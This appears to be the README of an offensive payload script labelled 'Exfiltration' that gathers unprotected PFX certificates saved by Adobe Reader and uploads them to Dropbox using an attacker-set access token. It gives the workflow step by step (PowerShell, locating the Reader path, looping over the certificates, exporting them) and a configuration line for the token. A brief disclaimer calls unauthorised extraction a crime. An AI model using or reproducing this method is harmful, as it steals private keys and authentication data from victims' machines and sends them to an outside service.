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# Export all saved certificates with Adobe Reader
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This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
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**Category**: Exfiltration
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## Description
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This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
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Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx certificates, then set the exfiltration settings and export the certificates trough a foreach using Dropbox.
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**The unauthorized extraction of PFX certificates can be considered a criminal offense**. Taking possession of such certificates, which contain sensitive information such as private keys and critical authentication data, violates the owner's property rights.
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## Dependencies
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* Adobe Reader must be installed
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* Internet Connection
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## Settings
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- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
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`DEFINE DROPBOX_ACCESS_TOKEN "example"`
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